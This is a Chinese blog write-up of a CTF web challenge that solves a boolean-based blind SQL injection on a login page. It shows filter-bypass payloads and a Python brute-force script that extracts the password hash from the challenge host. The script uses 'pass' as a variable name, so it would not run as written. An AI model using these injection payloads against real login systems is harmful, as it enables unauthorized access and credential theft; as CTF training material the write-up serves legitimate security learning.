ctf-web-sql注入

题目链接:跳转提示

打开网页,一个登陆页面,根据题是本题题型是基于布尔的SQL盲注

首先在用户名处输入admin

得到结果:

即密码确为admin,而如果不输入用户名直接输入密码,发现报错

可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。

经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用

尝试输入:ad'or(ascii(substr((password)from(1)))<>97)#

只有当ascii(substr((password)from(1)))==97时,整个句式username=='ad'or(ascii(substr((password)from(1)))<>97)为假,

即预计只有当显示结果为username does not exist!时,ascii(substr((password)from(1)))<>97为假,可以用此方法判断password的内容

得到结果:

 发现句式可用,因为ad不是用户名,结果却显示密码错误,没有显示用户名错误,根据or的特性,说明后半段的语句为真,即password的第一个字符<>97

利用脚本:

import requests
ra=requests.session()
pass=""
for j in range(1,100):
    flag=0
    for i in range(48,123):
        test="admin1'or(ascii(substr((password)from("+str(j)+")))<>"+str(i)+")#"
        url='http://114.67.175.224:18554/'
        data={
            'username':test,
            'password':""
        }
        pa=ra.post(url=url,data=data).text
        if "username does not exist!" in pa:
            pass+=chr(i)
            flag=i
            break
    if flag==123:
        break
print(pass)

 

得到password=4dcc88f8f1bc05e7c2ad1a60288481a2

发现密码错误,因为这串字符符合md5摘要格式(32个字符,只包含0~9,a~f字符)

md5解码果然得到:bugkuctf

输入用户名:admin     密码:bugkuctf 得到flag

(PS:这道题还没开始注入就把密码试出来了,这密码太简单了)

  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值